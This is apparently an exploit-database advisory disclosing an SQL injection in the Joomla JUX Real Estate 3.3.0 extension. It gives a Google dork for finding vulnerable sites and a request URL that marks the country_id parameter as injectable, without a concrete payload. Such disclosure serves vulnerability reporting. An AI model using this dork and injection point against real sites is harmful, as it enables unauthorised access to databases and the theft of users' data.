Joomla JUX Real Estate 3.3.0 SQL Injection

2018.01.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################ #Title: Joomla! JUX Real Estate 3.3.0 - SQL injection #Credit: Bilal KARDADOU #Vendor: https://joomlaux.com #URL: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/jux-real-estate/ #Product: 'Joomla! JUX Real Estate 3.3.0' #Developer: JoomlaUX #Extension type: Plugin #Last updated: Oct 30 2017 #Compatibility: 3.X #Type: Paid download #Google Dork: inurl:"index.php?option=com_jux_real_estate" ################################################ # # Description: # JUX Real Estate is a JOOMLA component designed to fit a multitude of real estate related needs, and it is developed by JoomlaUX team. # # # --Method=GET -p [country_id] # # -u " http://127.0.0.1/realestate/index.php?option=com_jux_real_estate&view=realties&Itemid=148&title=a&price_slider_lower=28607&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=0&cat_id=0&country_id=[SQLI]&locstate=&beds=0&agent_id=&baths=0&jp_yearbuilt=&button=Search " # # PoC: # https://prnt.sc/hw0u6q # # # Bilal KARDADOU - https://www.linkedin.com/in/kardadou/) ################################################


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top